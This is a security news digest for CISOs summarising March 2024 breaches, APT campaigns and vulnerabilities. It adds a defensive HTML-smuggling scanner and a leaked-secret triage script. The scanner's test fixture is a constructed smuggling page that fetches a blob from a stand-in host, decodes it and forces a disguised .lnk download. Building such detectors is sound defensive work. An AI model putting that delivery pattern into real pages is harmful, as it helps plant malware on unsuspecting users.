CISO Daily Update - March 19, 2024
NEW DEVELOPMENTS
Fujitsu Found Malware on IT Systems, Confirms Data Breach
Source: Bleeping Computer
Tech giant Fujitsu disclosed a cybersecurity incident involving malware infections on its IT systems, potentially resulting in customer data theft. The company, known for its diverse portfolio and collaboration with the Japanese government, detected the presence of malware on multiple business systems, prompting response actions such as isolation and enhanced monitoring. While investigations are ongoing to determine the extent of the breach and the data compromised, Fujitsu has notified the authorities and is preparing notices for any affected customers. This incident follows a previous hack in May 2021, in which Fujitsu's ProjectWEB tool was exploited, leading to the unauthorized access and theft of sensitive government data.
APT28 Hacker Group Targeting Europe, Americas, Asia in Widespread Phishing Scheme
Source: The Hacker News
A Russia-linked threat actor known as APT28 has been linked to phishing campaigns targeting government and non-governmental organizations across Europe, the Americas, Asia, and other regions. IBM X-Force reveals the use of lure documents related to finance, critical infrastructure, and cybersecurity to deceive victims. Tactics include leveraging Microsoft Windows protocols and exploiting vulnerabilities in Microsoft Outlook. Recent activities involve targeting Ukrainian and Polish entities with bespoke implants and information stealers. APT28's arsenal includes a variety of malware variants for file exfiltration, command execution, and browser data theft. Evidence suggests that compromised Ubiquiti routers may have been used to host command and control servers.
Hackers Using Sneaky HTML Smuggling to Deliver Malware via Fake Google Sites
Source: The Hacker News
Hackers have launched a sophisticated malware campaign utilizing deceptive Google Sites pages and HTML smuggling to distribute AZORult, a notorious information-stealing malware. The attack involves embedding the malicious payload within a JSON file on an external website to bypass traditional security measures. AZORult is known for its capability to steal sensitive data, including credentials, browser history, and cryptocurrency wallets, and is delivered via rogue Google Docs pages using HTML smuggling. This stealthy technique exploits legitimate HTML5 and JavaScript features to assemble and launch the malware in the browser, evading detection by email gateways and anti-malware products. The campaign also employs CAPTCHA barriers and shortcut files masquerading as PDF bank statements to execute PowerShell scripts and deploy the AZORult loader.
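For defenders, the useful takeaway is that the smuggling pattern described above (fetch or embed a blob, decode it client-side, force a download of a shortcut) leaves recognizable traces in page source. The following heuristic scanner is an added example, not code from the article or the campaign; the indicator list, weights and threshold are assumptions, and both sample pages are constructed.

```python
"""Heuristic scanner for HTML-smuggling indicators in page source (added example).

Flags pages that decode an embedded or fetched blob in the browser and push it
to the user as a download. Indicator weights and the threshold are assumed.
"""
import re

# (name, pattern, weight): weights are an assumed scoring scheme, not a standard.
INDICATORS = [
    ("base64_decode", re.compile(r"\batob\s*\("), 2),
    ("blob_construct", re.compile(r"new\s+Blob\s*\("), 2),
    ("object_url", re.compile(r"URL\.createObjectURL\s*\("), 2),
    ("legacy_save_blob", re.compile(r"msSaveOrOpenBlob"), 2),
    ("forced_download", re.compile(r"\.download\s*=|download\s*=\s*[\"']"), 1),
    ("synthetic_click", re.compile(r"\.click\s*\(\s*\)"), 1),
    ("external_json_fetch", re.compile(r"fetch\s*\(\s*[\"']https?://[^\"']+\.json"), 2),
    ("dangerous_extension", re.compile(r"\.(?:lnk|iso|zip|js|vbs|hta)[\"']", re.I), 1),
]

def scan_html(html: str) -> dict:
    """Return matched indicator names, a total score and a verdict (score >= 5)."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(html)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return {"hits": hits, "score": score, "suspicious": score >= 5}

# Constructed sample: fetches a JSON-wrapped blob, decodes it and forces a
# download of a shortcut file named like a PDF. No real payload is present.
SMUGGLING_PAGE = """<html><body><script>
fetch('https://example.invalid/data/statement.json')
  .then(r => r.json())
  .then(j => {
    const bytes = Uint8Array.from(atob(j.d), c => c.charCodeAt(0));
    const blob = new Blob([bytes], {type: 'application/octet-stream'});
    const a = document.createElement('a');
    a.href = URL.createObjectURL(blob);
    a.download = 'Bank_Statement.pdf.lnk';
    a.click();
  });
</script></body></html>"""

# Constructed benign sample: a plain download link and an ordinary click handler.
BENIGN_PAGE = """<html><body><a href="/report.pdf" download="report.pdf">Report</a>
<script>document.getElementById('x').addEventListener('click', () => 1);</script>
</body></html>"""
```

A single hit such as a `download` attribute is normal web behaviour; the verdict only fires when several decode-assemble-deliver indicators co-occur.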
The Aviation and Aerospace Sectors Face Skyrocketing Cyber Threats
Source: Security Affairs
The aviation and aerospace sectors are facing a surge in cyber threats, with major ransomware groups and advanced threat actors targeting airports and aviation companies. A prominent ransomware group known as LockBit 3.0 has executed attacks on notable companies, including Bangkok Airways, E.M.I.T Aviation Consulting, Kuwait Airlines, and Air Albania. Geopolitical tensions, exemplified by the conflicts in Ukraine and the Middle East, have exacerbated the risk of destructive cyberattacks on critical infrastructure sectors like aerospace. Given its designation as critical infrastructure, the aviation sector is more visible and more exposed to cyber threats, attracting advanced persistent threat groups and hacktivist collectives.
Apex Legends Players Worried About RCE Flaw After ALGS Hacks
Source: Bleeping Computer
The North American finals of the Apex Legends Global Series (ALGS) have been postponed by Electronic Arts due to hackers compromising players mid-match. In Match 3 of the NA finals, one player suddenly displayed a cheat tool, granting an unfair advantage by revealing all players' positions on the map. Despite the intervention of tournament admins, the hacker struck again. The hacks were attributed to hackers who claimed to have exploited a remote code execution (RCE) vulnerability to hijack players' clients. While theories abound regarding the source of the vulnerability, Easy Anti-Cheat has asserted that there is no RCE flaw within their software. The incident marks an unprecedented occurrence in ALGS history, leading to suspending the tournament's matches and raising concerns about the security of esports competitions.
Chinese Earth Krahang Hackers Breach 70 Orgs in 23 Countries
Source: Bleeping Computer
A sophisticated hacking campaign attributed to a Chinese Advanced Persistent Threat (APT) group named 'Earth Krahang' has targeted 70 organizations across 45 countries, focusing on government entities. Trend Micro researchers have been monitoring the activity since early 2022 and have observed the group exploiting vulnerable internet-facing servers and employing spear-phishing emails to deploy custom backdoors for cyberespionage. Earth Krahang leverages compromised government infrastructure to launch attacks on other governments, establish VPN servers on breached systems, and conduct password brute-forcing to gain access to valuable email accounts. The threat actors use open-source tools to scan for specific vulnerabilities and deploy webshells for unauthorized access within victim networks. Spear-phishing emails themed around geopolitical topics are used as initial access vectors, with malicious attachments dropping backdoors onto victims' computers. The group also utilizes compromised email accounts to target colleagues or other governments with spear-phishing emails.
New DEEP#GOSU Malware Campaign Targets Windows Users with Advanced Tactics
Source: The Hacker News
Security researchers at Securonix uncovered a sophisticated cyberattack campaign dubbed DEEP#GOSU, attributed to the North Korean state-sponsored group Kimsuky. This campaign utilizes PowerShell and VBScript malware to target Windows systems, particularly in Ukraine, to stealthily collect sensitive information. The malware employed in the campaign exhibits advanced capabilities, including keylogging, clipboard monitoring, dynamic payload execution, data exfiltration, and persistence mechanisms such as RAT software and scheduled tasks. Notably, the attackers leverage legitimate cloud services like Dropbox and Google Docs for command-and-control purposes, allowing them to evade detection and update the malware's functionality seamlessly. The attack begins with malicious email attachments containing rogue shortcut files, which, when opened, execute PowerShell scripts to retrieve and execute additional malicious payloads from Dropbox. These payloads include a .NET assembly file acting as a remote access trojan (TruRat) and a VBScript for further execution of PowerShell scripts via WMI and setting scheduled tasks for persistence. The VBScript also utilizes Google Docs to dynamically retrieve configuration data, enabling the threat actor to modify account information without altering the script.
VULNERABILITIES TO WATCH
New Attack Shows Risks of Browsers Giving Websites Access to GPU
Source: Security Week
A team of researchers has unveiled a novel GPU cache side-channel attack conducted entirely within web browsers through the WebGPU API, enabling the exploitation of vulnerabilities in AMD and NVIDIA graphics cards. This attack, requiring only a victim's visit to a malicious website, poses risks of sensitive data theft and covert data exfiltration. While notifications were sent to browser developers and GPU manufacturers, no immediate actions have been announced, with ongoing discussions underway about the necessity of permission pop-ups for GPU access in browsers to mitigate potential risks.
Fortra Patches Critical RCE Vulnerability in FileCatalyst Transfer Tool
Source: The Hacker News
Fortra has patched a significant remote code execution (RCE) vulnerability in its FileCatalyst file transfer service, known as CVE-2024-25153. Unauthenticated attackers might use this security flaw to upload files outside their intended path and execute arbitrary code, including web shells on vulnerable servers. The vulnerability was initially reported on August 9, 2023, and was addressed in FileCatalyst Workflow version 5.1.6 Build 114. Fortra also patched two further security vulnerabilities in FileCatalyst Direct (CVE-2024-25154 and CVE-2024-25155) in January 2024.
Over 50,000 Vulnerabilities Discovered in DoD Systems Through Bug Bounty Program
Source: Infosecurity Magazine
The US Department of Defense (DoD) has identified over 50,000 vulnerabilities in its systems through its vulnerability disclosure program (VDP), managed by the DoD Cyber Crime Center (DC3). Launched in November 2016 following the 'Hack the Pentagon' bug bounty program, DC3's VDP invites ethical hackers to continuously identify and report vulnerabilities within US military IT systems. In 2021, DC3 partnered with the Defense Counterintelligence and Security Agency on a pilot program targeting small to medium Defense Industrial Base companies (DIBCOs), resulting in significant savings and recognition with the DoD Chief Information Officer Annual Award. Additionally, the DoD collaborates with platforms like HackerOne, Bugcrowd, and Synack on standalone bug bounty programs covering various departments and assets, ensuring ongoing cybersecurity efforts.
Three New Critical Vulnerabilities Uncovered in Argo
Source: Infosecurity Magazine
KTrust's in-house researchers have identified three critical vulnerabilities within Argo, a widely used GitOps continuous delivery tool in Kubernetes setups. The first vulnerability, CVE-2024-21662, involves overloading the cache system to bypass rate-limit and brute-force protection mechanisms, leaving the system open to attack. CVE-2024-21652 exploits weaknesses to bypass brute-force protection, while CVE-2024-21661 allows for DoS attacks due to improper array manipulation in a multi-threaded environment. KTrust reported these vulnerabilities to Argo in September 2023, and Argo is reportedly working on addressing them in a future release. Nadav Aharon-Nov, CTO and co-founder of KTrust, emphasized the importance of promptly addressing such vulnerabilities to prevent potential security breaches. Despite attempts to contact Argo for comment, the project had not responded at the time of writing. Security measures to defend Kubernetes environments include implementing robust access controls, regular software updates, network segmentation, and conducting security audits.
SPECIAL REPORTS
Tracking Everything on the Dark Web Is Mission Critical
Source: Darkreading
Monitoring the Dark Web is standard practice to detect potential breaches of sensitive company data. However, finding company information on the Dark Web doesn't necessarily indicate a successful attack; the data could have originated from sources like cloud storage, employee devices, or third-party partners. Reacting hastily to Dark Web discoveries can lead to unnecessary and expensive changes, potentially triggering compliance disclosures and financial penalties based on flawed assumptions. Sensitive data breaches require thorough investigation to determine the extent of the exposure and its origin. Precise coding and labeling enable tracing data back to its source, aiding in identifying vulnerabilities that may require action. For expired secrets, their presence on the Dark Web may not be critical, but active keys represent a serious threat requiring swift and appropriate action. Establishing detailed metadata tracking from the creation of secrets to their movement ensures a proactive approach to breach detection and response.
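The labeling-and-metadata practice above can be made concrete: issue every secret with a visible, non-sensitive label, keep a registry of who requested it, where it was provisioned and when it expires, and triage any string found on the Dark Web against that registry. This is an added example, not code from the article; the `acme_<id>_<secret>` format, the registry fields and the scenario in `demo()` are assumptions constructed for illustration.

```python
"""Trace a leaked secret to its origin and decide whether it is still live (added example).

The label format and registry fields are assumed; a real secret manager
exposes equivalent metadata through its own API.
"""
from __future__ import annotations
import secrets
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

PREFIX = "acme"  # assumed org tag embedded in every issued secret

@dataclass(frozen=True)
class SecretRecord:
    key_id: str
    owner: str          # team or service that requested the secret
    system: str         # where it was provisioned, e.g. "ci-runner"
    created: datetime
    expires: datetime
    revoked: bool = False

def issue_secret(registry: dict, owner: str, system: str, now: datetime,
                 ttl: timedelta = timedelta(days=90)) -> str:
    """Mint a secret whose label lets it be traced without revealing the secret part."""
    key_id = secrets.token_hex(4)
    registry[key_id] = SecretRecord(key_id, owner, system, now, now + ttl)
    return f"{PREFIX}_{key_id}_{secrets.token_urlsafe(24)}"

def triage_leak(found: str, registry: dict, now: datetime) -> dict:
    """Classify a string seen on the Dark Web as unknown, revoked, expired or active."""
    parts = found.split("_", 2)
    if len(parts) != 3 or parts[0] != PREFIX or parts[1] not in registry:
        return {"status": "unknown", "origin": None}
    rec = registry[parts[1]]
    origin = {"owner": rec.owner, "system": rec.system, "created": rec.created.isoformat()}
    if rec.revoked:
        return {"status": "revoked", "origin": origin}
    if now >= rec.expires:
        return {"status": "expired", "origin": origin}
    return {"status": "active", "origin": origin}

def demo() -> dict:
    """Constructed scenario: a long-expired backup key, a fresh CI key, a foreign token."""
    registry, now = {}, datetime(2024, 3, 19, tzinfo=timezone.utc)
    old = issue_secret(registry, "data-eng", "s3-backup", now - timedelta(days=200))
    live = issue_secret(registry, "ci", "ci-runner", now - timedelta(days=1))
    samples = (("old", old), ("live", live), ("foreign", "ghp_notours"))
    return {name: triage_leak(s, registry, now)["status"] for name, s in samples}
```

Only the `active` outcome warrants the rapid rotation the article calls for; `expired` and `unknown` findings still get logged and investigated for origin, but without triggering disclosure on an assumption.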